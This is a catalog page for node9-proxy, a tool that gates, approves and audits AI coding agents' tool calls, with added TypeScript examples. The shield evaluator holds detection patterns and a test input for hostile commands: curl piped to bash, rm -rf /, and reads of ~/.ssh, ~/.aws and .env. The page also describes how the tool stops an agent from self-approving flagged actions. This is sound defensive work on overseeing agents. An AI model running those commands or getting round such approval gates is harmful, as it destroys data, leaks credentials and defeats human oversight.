by node9-ai
The Execution Security Layer for the Agentic Era. Providing deterministic "Sudo" governance and audit logs for autonomous AI agents.
# Add to your Claude Code skills
```sh
git clone https://github.com/node9-ai/node9-proxy
```

Last scanned: 5/30/2026
```json
{
  "issues": [
    {
      "type": "npm-audit",
      "message": "brace-expansion: brace-expansion: Zero-step sequence causes process hang and memory exhaustion",
      "severity": "medium"
    },
    {
      "type": "npm-audit",
      "message": "flatted: flatted vulnerable to unbounded recursion DoS in parse() revive phase",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "handlebars: Handlebars.js has JavaScript Injection via AST Type Confusion by tampering @partial-block",
      "severity": "critical"
    },
    {
      "type": "npm-audit",
      "message": "ip-address: ip-address has XSS in Address6 HTML-emitting methods",
      "severity": "medium"
    },
    {
      "type": "npm-audit",
      "message": "lodash: lodash vulnerable to Code Injection via `_.template` imports key names",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "lodash-es: lodash vulnerable to Code Injection via `_.template` imports key names",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "minimatch: minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "npm: Vulnerability found",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "picomatch: Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "postcss: PostCSS has XSS via Unescaped </style> in its CSS Stringify Output",
      "severity": "medium"
    },
    {
      "type": "npm-audit",
      "message": "tar: tar has Hardlink Path Traversal via Drive-Relative Linkpath",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "vite: Vite Vulnerable to Path Traversal in Optimized Deps `.map` Handling",
      "severity": "high"
    }
  ],
  "status": "FAILED",
  "scannedAt": "2026-05-30T15:42:52.070Z",
  "npmAuditRan": true,
  "pipAuditRan": true
}
```

node9-proxy is an open-source AI agents skill for AI coding assistants such as Claude Code, Codex CLI, and ChatGPT, built by node9-ai. The Execution Security Layer for the Agentic Era. Providing deterministic "Sudo" governance and audit logs for autonomous AI agents. It has 206 GitHub stars.
node9-proxy failed SkillsLLM's automated security scan, which flagged high- and critical-severity advisories in its npm dependencies (every issue above is of type "npm-audit"). Review the Security Report section carefully before using it.
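To reproduce a report of the shape shown above from the project's own lockfile, run `npm audit --json` in a clone and convert npm's per-package entries into the issue list. The converter below is an added example, not SkillsLLM's scanner or node9's code; it reads only the audit fields named in the interfaces, maps npm's "moderate" to the report's "medium", and fails the gate on anything high or critical, all of which are assumptions chosen to match the report above. The audit document at the bottom is a constructed sample in the npm v7+ format.

```typescript
// Added example, not SkillsLLM's scanner or node9's code: turn `npm audit --json`
// into the {type, message, severity, status} shape of the catalog report.
// Field subset, "moderate" -> "medium" mapping and the fail threshold are assumptions.

type Severity = "low" | "medium" | "high" | "critical";

interface Issue { type: "npm-audit"; message: string; severity: Severity }
interface Report { issues: Issue[]; status: "PASSED" | "FAILED"; npmAuditRan: boolean }

// The parts of npm's per-package entry this example reads. "via" holds advisory
// objects for direct findings, or plain package-name strings when the package is
// only vulnerable through one of its dependencies.
interface Advisory { title?: string; url?: string; severity?: string }
interface AuditVuln { name: string; severity: string; via: (string | Advisory)[] }
interface AuditDoc { auditReportVersion?: number; vulnerabilities: Record<string, AuditVuln> }

// npm reports "moderate"; the catalog shows "medium". "info" carries no issue.
function mapSeverity(npmSeverity: string): Severity | null {
  switch (npmSeverity) {
    case "low": return "low";
    case "moderate": return "medium";
    case "high": return "high";
    case "critical": return "critical";
    default: return null;
  }
}

function toIssues(doc: AuditDoc): Issue[] {
  const issues: Issue[] = [];
  for (const [pkg, vuln] of Object.entries(doc.vulnerabilities)) {
    const severity = mapSeverity(vuln.severity);
    if (severity === null) continue;
    const advisory = vuln.via.find((v: string | Advisory): v is Advisory => typeof v === "object");
    // Transitive-only entries carry no advisory title, hence the generic message.
    const title = advisory && advisory.title ? advisory.title : "Vulnerability found";
    issues.push({ type: "npm-audit", message: `${pkg}: ${title}`, severity });
  }
  return issues.sort((a, b) => a.message.localeCompare(b.message));
}

// Fail the gate on anything high or critical; lower findings are reported only.
const FAIL_AT: ReadonlySet<Severity> = new Set<Severity>(["high", "critical"]);

function gate(doc: AuditDoc): Report {
  const issues = toIssues(doc);
  const failed = issues.some((i) => FAIL_AT.has(i.severity));
  return { issues, status: failed ? "FAILED" : "PASSED", npmAuditRan: true };
}

// Constructed sample in the npm audit format, trimmed to the fields read above.
const SAMPLE_AUDIT: AuditDoc = {
  auditReportVersion: 2,
  vulnerabilities: {
    "handlebars": {
      name: "handlebars", severity: "critical",
      via: [{ title: "Handlebars.js has JavaScript Injection via AST Type Confusion by tampering @partial-block", severity: "critical" }],
    },
    "brace-expansion": {
      name: "brace-expansion", severity: "moderate",
      via: [{ title: "Zero-step sequence causes process hang and memory exhaustion", severity: "moderate" }],
    },
    // Only vulnerable through brace-expansion: "via" is a package name, no title.
    "example-cli": { name: "example-cli", severity: "moderate", via: ["brace-expansion"] },
  },
};

console.log(JSON.stringify(gate(SAMPLE_AUDIT), null, 2));
```

Run it against real output with `npm audit --json > audit.json` and `JSON.parse` of that file in place of the sample; the "Vulnerability found" message with no title is exactly what a package that is only vulnerable through a dependency produces, which is why the npm entry in the report above carries no advisory text.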
Clone the repository with "git clone https://github.com/node9-ai/node9-proxy" and add it to your Claude Code skills directory (see the Installation section above).
node9-proxy is primarily written in TypeScript. It is open-source under node9-ai on GitHub, so you can review or fork the full source.
Yes. SkillsLLM lists many other AI Agents skills you can browse and compare side by side. Open the AI Agents category from the badge at the top of this page, or use the Related Skills and comparison links further down to weigh node9-proxy against similar tools.
Node9 sits between your AI agent and the tools it can use — discover what it's already been doing, protect against risky actions in real time, and review what happened over any time window.
Works with Claude Code · Codex CLI · Antigravity (agy) · GitHub Copilot CLI · Gemini CLI · Cursor · Windsurf · VSCode · Claude Desktop · Opencode · Pi · Hermes Agent · any MCP server.
What the scan flags: rm -rf, git push --force, DROP TABLE, credential reads, curl | bash, AWS/GitHub/Stripe key leaks.

This is my own machine — 90 days while building Node9. Score 25/100, 5 credential files an AI agent could reach right now.

```sh
npx node9-ai scan   # before installation, runs in ~10s, nothing uploads
node9 scan          # after installation, same output
```
node9 posture grades how exposed this machine is to a compromised agent — isolation, egress, secrets on disk, supply chain, privilege — and hands you the exact command to fix each finding.
```sh
node9 posture          # scorecard with the #1 risk and a fix for every finding
node9 posture --ship   # send a redacted snapshot to your node9 dashboard (fleet view)
```
Findings are grouped by who can fix them: 🔒 the ones node9 reduces (just run the command) and 🧱 the ones only you can. Each carries a plain-language what / why / who and a real remediation — e.g. the "agent runs unsandboxed on the host" finding points straight at node9 sandbox run (below).
```text
🛡️ Node9 Posture — agent on this host
Score: 100/100 (Good)
2 advisories below don't affect the score — OS-level exposure, yours to weigh.

🟢 node9 is already protecting you
✅ Secrets        node9 DLP is blocking this
✅ Egress         node9 egress is approval-gating this
✅ Approval gate  node9 is blocking this
✅ Privilege      node9 is approval-gating this

🔒 node9 reduces these — run the command, the rest is yours
⚠️ Isolation  Running directly on the host — no container
   The agent runs loose on your whole machine, not in a sandbox.
   → node9 sandbox run <agent> — jail it: kernel egress + scoped mounts + node9 inside
   → node9 shield enable project-jail — or shrink the blast radius, keep host access
⚠️ Network exposure  4 services on 0.0.0.0 (node :3000/:4000, PostgreSQL :5432, Redis :6379)
   Reachable from your whole network, not just this laptop.
   → node9 shield enable postgres|redis — node9 blocks DROP TABLE / FLUSHALL
   → bind to 127.0.0.1 / firewall the port (your part)

✅ Supply chain  no issues found
✅ Coverage      no issues found

Track this across your fleet & keep it green → node9.ai
```
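The two findings that carry most of the weight in a scorecard like the one above are "secrets an agent could reach" and "services on 0.0.0.0". The code below is an added example, not node9's posture implementation: it asks the kernel (via `fs.accessSync`) which well-known credential files the current uid can read, checks whether their mode is looser than 0600, parses a listener table for wildcard binds, and folds both into a score. The path list, the 15/10-point weights and the remediation strings are assumptions; the `$HOME` fixture and the `ss -ltn`-shaped listener table are constructed sample data.

```typescript
// Added example, not node9's code: two posture checks in the spirit of the
// "Secrets" and "Network exposure" findings. Credential path list, scoring
// weights and fix text are assumptions; the fixture home and the listener
// table are constructed sample data.
import * as fs from "node:fs";
import * as os from "node:os";
import * as path from "node:path";

interface Finding { check: "secrets" | "network"; detail: string; fix: string }

// Files an agent running as this user could read and exfiltrate, relative to $HOME.
const SECRET_PATHS: readonly string[] = [
  ".ssh/id_rsa", ".ssh/id_ed25519", ".aws/credentials", ".config/gh/hosts.yml", ".npmrc", ".env",
];

// accessSync is the real test: it asks the kernel whether *this* uid can read
// the file, which is exactly what an agent process running as that uid can do.
function reachableSecrets(home: string): Finding[] {
  const findings: Finding[] = [];
  for (const rel of SECRET_PATHS) {
    const file = path.join(home, rel);
    try {
      fs.accessSync(file, fs.constants.R_OK);
    } catch (err) {
      continue; // absent or unreadable: nothing to exfiltrate
    }
    const mode = fs.statSync(file).mode & 0o777;
    const groupOrWorld = (mode & 0o077) !== 0;
    findings.push({
      check: "secrets",
      detail: `${rel} readable, mode ${mode.toString(8)}`,
      // A loose mode has a one-line fix. A correct 0600 file is still readable to
      // the agent, so the real fix there is isolation or a secret manager.
      fix: groupOrWorld ? `chmod 600 ${file}` : `keep ${rel} out of the agent's reach (sandbox or secret manager)`,
    });
  }
  return findings;
}

// Constructed sample in the shape of `ss -ltn` output on Linux.
const SAMPLE_SS = `
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:3000        0.0.0.0:*
LISTEN 0      128    127.0.0.1:5432      0.0.0.0:*
LISTEN 0      511    *:6379              *:*
LISTEN 0      128    [::]:4000           [::]:*
LISTEN 0      128    [::1]:8080          [::]:*
`;

// Wildcard binds (0.0.0.0, *, [::]) are reachable from the whole network.
function exposedListeners(ssOutput: string): Finding[] {
  const findings: Finding[] = [];
  for (const line of ssOutput.split("\n")) {
    const cols = line.trim().split(/\s+/);
    if (cols[0] !== "LISTEN") continue;
    const m = /^(.*):(\d+)$/.exec(cols[3] ?? "");
    if (!m) continue;
    const addr = m[1];
    const port = m[2];
    if (addr === "0.0.0.0" || addr === "*" || addr === "[::]") {
      findings.push({ check: "network", detail: `port ${port} bound to all interfaces (${addr})`,
        fix: `bind to 127.0.0.1 or firewall port ${port}` });
    }
  }
  return findings;
}

// 15 points per reachable secret, 10 per exposed port, floored at 0 (assumed weights).
function posture(home: string, ssOutput: string): { score: number; findings: Finding[] } {
  const findings = [...reachableSecrets(home), ...exposedListeners(ssOutput)];
  const penalty = findings.reduce((n, f) => n + (f.check === "secrets" ? 15 : 10), 0);
  return { score: Math.max(0, 100 - penalty), findings };
}

// Builds a throwaway $HOME with three reachable credential files (constructed fixture).
function buildSampleHome(): string {
  const home = fs.mkdtempSync(path.join(os.tmpdir(), "posture-"));
  fs.mkdirSync(path.join(home, ".ssh"));
  fs.mkdirSync(path.join(home, ".aws"));
  fs.writeFileSync(path.join(home, ".ssh/id_rsa"), "-----BEGIN KEY-----\n");
  fs.chmodSync(path.join(home, ".ssh/id_rsa"), 0o644); // deliberately too loose
  fs.writeFileSync(path.join(home, ".aws/credentials"), "[default]\n", { mode: 0o600 });
  fs.writeFileSync(path.join(home, ".env"), "STRIPE_KEY=sk_test_placeholder\n", { mode: 0o600 });
  return home;
}

console.log(JSON.stringify(posture(buildSampleHome(), SAMPLE_SS), null, 2));
```

Point it at a real machine by passing `os.homedir()` and the output of `ss -ltn` (or `netstat -an` on macOS, whose column layout differs and would need its own parser). Note what the check does not cover: a file the agent can reach through a symlink, a mounted volume, or a container bind mount is just as exposed, which is why the posture finding for isolation points at the sandbox rather than at file modes.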
node9 monitor opens an interactive terminal dashboard with two views:

- [1] Realtime: live activity, approvals, security alerts, current risk score
- [2] Report: period-windowed summary of cost, top tools, shields fired, blast radius

Press [2] in monitor for a period-windowed summary. Toggle the window with [T]oday · [W]eek · [M]onth · [N]inety; the panels are the same as the scan above, driven by your post-install audit log.

```sh
node9 monitor              # press [2] for Report view
node9 report --period 7d   # CLI form, no TUI
```
```sh
# macOS / Linux
brew tap node9-ai/node9 && brew install node9

# or via npm (any platform)
npm install -g node9-ai

node9 init     # auto-wires all detected agents + MCP servers
node9 doctor   # verify everything is wired correctly
```

Requires Node.js 18+.
Each shield is a curated rule set for a service or domain. Enable only what you need.
| Shield | What it catches | Enable |
|---|---|---|
| project-jail | Blocks reads of ~/.ssh, ~/.aws, .env, credentials via Bash and Read tool | node9 shield enable project-jail |
| bash-safe | curl \| bash, rm -rf /, disk overwrite, eval of remote | node9 shield enable bash-safe |
| postgres | DROP TABLE, TRUNCATE, DROP COLUMN, DELETE without WHERE | node9 shield enable postgres |
| mongodb | dropDatabase, drop(), deleteMany({}), index drops | node9 shield enable mongodb |
| redis | FLUSHALL, FLUSHDB, CONFIG SET on a live server | node9 shield enable redis |
| aws | S3 delete, EC2 terminate, IAM changes, RDS destroy | node9 shield enable aws |
| k8s | namespace delete, helm uninstall, cluster role wipes | node9 shield enable k8s |
| docker | system prune, volume prune, rm -f containers | node9 shield enable docker |
| github | gh repo delete, remote branch deletion, settings changes | node9 shield enable github |
| filesystem | chmod 777, writes under /etc/, /boot/, /usr/ | node9 shield enable filesystem |
| mcp-tool-gating | unapproved MCP tools silently activating new capabilities | node9 shield enable mcp-tool-gating |

```sh
node9 shield list   # show all shields + status
```
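To make concrete what a curated rule set like the shields above has to do, here is an added example of a minimal shield evaluator. It is not node9's rule engine and the patterns are not node9's: shield names mirror the table, while the three verdict levels, the `evaluate(tool, input)` shape and every regex are assumptions made for the illustration. It normalizes the tool input, runs only the rules registered for that tool, and returns the most restrictive verdict together with every rule that fired, so an audit log can name the shield. The SQL check shows the one case a regex alone gets wrong: "DELETE without WHERE" has to be judged per statement, otherwise a WHERE in a later statement excuses a bare one earlier.

```typescript
// Added example, not node9's code: a minimal evaluator for a "shield" rule set.
// Shield names mirror the table above; the Verdict levels, the evaluate() shape
// and the patterns below are this example's assumptions.

type Verdict = "allow" | "ask" | "deny";
const RANK: Record<Verdict, number> = { allow: 0, ask: 1, deny: 2 };

interface Rule {
  shield: string;
  tools: readonly string[];            // tool calls the rule applies to
  verdict: Verdict;
  reason: string;
  match: (normalized: string) => boolean;
}

interface Evaluation {
  verdict: Verdict;
  hits: { shield: string; reason: string }[];
}

// Collapse whitespace so "rm  -rf   /" and "rm -rf /" hit the same rule.
// Text rules cannot see through obfuscation (variables, base64, aliases);
// closing that gap is what the sandbox further down is for.
function normalize(input: string): string {
  return input.replace(/\s+/g, " ").trim();
}

// DELETE/UPDATE with no WHERE in the same statement. Statements are split on
// ";" so a WHERE in a later statement does not excuse an earlier bare one.
function hasUnboundedWrite(sql: string): boolean {
  return sql.split(";").some((stmt) => {
    const s = stmt.trim().toLowerCase();
    return /^(delete\s+from|update)\s/.test(s) && !/\bwhere\b/.test(s);
  });
}

const RULES: readonly Rule[] = [
  { shield: "bash-safe", tools: ["bash"], verdict: "deny",
    reason: "remote content piped into a shell",
    match: (s) => /\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/i.test(s) },
  { shield: "bash-safe", tools: ["bash"], verdict: "deny",
    reason: "recursive force delete of / or the home directory",
    match: (s) => /\brm\s+-(\w*r\w*f|\w*f\w*r)\w*\s+(\/|~|\$HOME)(\s|$)/.test(s) },
  { shield: "project-jail", tools: ["bash", "read"], verdict: "deny",
    reason: "read of a credential file",
    match: (s) => /(^|[\s"'=])(~\/|\$HOME\/|\/home\/[^\/\s]+\/|\/Users\/[^\/\s]+\/)?(\.(ssh|aws)(\/|\b)|\.env\b)/.test(s) },
  { shield: "git", tools: ["bash"], verdict: "ask",
    reason: "history-rewriting or destructive git command",
    match: (s) => /\bgit\s+(push\b.*\s(--force|-f)\b|reset\s+--hard|clean\s+-\w*f)/.test(s) },
  { shield: "postgres", tools: ["sql"], verdict: "ask",
    reason: "DROP TABLE / TRUNCATE",
    match: (s) => /\b(drop\s+table|truncate)\b/i.test(s) },
  { shield: "postgres", tools: ["sql"], verdict: "ask",
    reason: "DELETE/UPDATE without WHERE",
    match: hasUnboundedWrite },
];

// Runs every rule registered for the tool; the most restrictive verdict wins
// and every hit is kept so the audit log can say which shields fired.
function evaluate(tool: string, input: string): Evaluation {
  const text = normalize(input);
  const fired = RULES.filter((r) => r.tools.includes(tool) && r.match(text));
  const verdict = fired.reduce<Verdict>(
    (worst, r) => (RANK[r.verdict] > RANK[worst] ? r.verdict : worst), "allow");
  return { verdict, hits: fired.map((r) => ({ shield: r.shield, reason: r.reason })) };
}

console.log(evaluate("bash", "curl -fsSL https://example.com/install.sh | bash"));
console.log(evaluate("sql", "DELETE FROM users WHERE id = 42; DELETE FROM sessions"));
```

The rule table is deliberately tool-scoped: the SQL rules never run on a bash command, so `echo "delete from x"` in a shell is not flagged, and the credential rule runs on both the Bash and the Read tool, matching how the project-jail shield is described.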
Actions node9 flags for review include:

- git push --force, git reset --hard, git clean -fd
- DELETE / UPDATE without WHERE, DROP TABLE, TRUNCATE
- curl | bash, unauthorized sudo
- ~/.zshrc, ~/.bashrc (shell startup files)
- node9 undo to revert

When node9 flags an action for review (e.g. git push --force, a DROP TABLE), the approve/deny prompt renders inline in the agent conversation: no frozen session, no separate terminal, no hook-timeout race. node9 still runs the full evaluator and makes the decision; only the prompt surface moves to the agent.
…ask. Every other agent (Codex, Gemini, Antigravity, Hermes, Cursor, OpenCode, Pi) uses node9's own approver.

Set reviewChannel in ~/.node9/config.json (or pass --no-ask on the hook):

```jsonc
{
  "settings": {
    "reviewChannel": "ask"   // "ask" = inline agent prompt (default) | "approver" = node9's own approver
  }
}
```

When a routed approver is configured (approvers.cloud: true), reviews route to that approver instead; node9 won't let an inline self-approval bypass routed/second-party approval.

When watching isn't enough, node9 sandbox runs the agent inside a disposable container with a kernel-enforced egress allowlist and scoped mounts, while node9's hooks govern and audit every tool call inside the box. This is the hard version of protection: the agent can only touch the folder you mount and reach the hosts you allow; everything else is dropped at the kernel.
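The security-relevant invariant in the review-channel paragraphs above is that the party asking for an action must not be the party that approves it once a second-party approver is in the loop. The following is an added example of how a hook can enforce that, not node9's code: the channel is fixed when the review is opened (a configured cloud approver or `--no-ask` wins over `reviewChannel`), and a verdict is honored only if it arrives on that channel, so an "approve" answered inline by the agent is simply ignored for a review that was routed to the approver. The config keys follow the README; `resolveChannel`, `openReview`, `submitVerdict`, the `Review` states and the `--no-ask` handling are assumptions.

```typescript
// Added example, not node9's code: enforcing "an inline self-approval cannot
// bypass a routed approver". Config keys mirror ~/.node9/config.json above;
// the function names and the Review state machine are assumptions made here.

interface Node9Config {
  settings: { reviewChannel: "ask" | "approver" };
  approvers?: { cloud?: boolean };   // routed / second-party approver
}

// "agent": prompt rendered inline in the conversation; "approver": node9's own.
type Channel = "agent" | "approver";

interface Review {
  action: string;
  channel: Channel;                  // fixed when the review is opened
  state: "pending" | "approved" | "denied";
}

// Where a flagged action's approve/deny prompt is surfaced. A configured cloud
// approver wins over reviewChannel; --no-ask on the hook forces the approver too.
function resolveChannel(cfg: Node9Config, hookFlags: { noAsk?: boolean } = {}): Channel {
  if (cfg.approvers && cfg.approvers.cloud) return "approver";
  if (hookFlags.noAsk) return "approver";
  return cfg.settings.reviewChannel === "ask" ? "agent" : "approver";
}

function openReview(cfg: Node9Config, action: string, hookFlags: { noAsk?: boolean } = {}): Review {
  return { action, channel: resolveChannel(cfg, hookFlags), state: "pending" };
}

// A verdict counts only if it arrives on the channel the review was routed to.
// Anything else (the agent answering a review that went to the approver, or a
// second answer after the first) leaves the review untouched.
function submitVerdict(review: Review, from: Channel, approve: boolean): Review {
  if (review.state !== "pending" || from !== review.channel) return review;
  return { ...review, state: approve ? "approved" : "denied" };
}

// Constructed walk-through: the same action with and without a routed approver.
function walkthrough(): { inlineOnly: Review; routed: Review; routedThenApprover: Review } {
  const inlineCfg: Node9Config = { settings: { reviewChannel: "ask" } };
  const routedCfg: Node9Config = { settings: { reviewChannel: "ask" }, approvers: { cloud: true } };
  // Inline channel: the agent's answer is the review.
  const inlineOnly = submitVerdict(openReview(inlineCfg, "git push --force"), "agent", true);
  // Routed: the agent's self-approval is ignored and the action stays held...
  const routed = submitVerdict(openReview(routedCfg, "git push --force"), "agent", true);
  // ...until the approver answers.
  const routedThenApprover = submitVerdict(routed, "approver", true);
  return { inlineOnly, routed, routedThenApprover };
}

console.log(JSON.stringify(walkthrough(), null, 2));
```

The point of fixing the channel at open time rather than re-reading config at verdict time is that a hook cannot be talked into downgrading a pending review: even if the agent rewrites `~/.node9/config.json` mid-review (a write the filesystem and project-jail shields would themselves flag), the already-opened review keeps its approver channel.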
```sh
cd ~/my-project
node9 sandbox new    # write node9.sandbox.yaml: what to mount + which hosts to allow
node9 sandbox run    # build + boot the jailed agent (your project at /workspace)
node9 sandbox tail   # watch the agent's actions live, from the host
```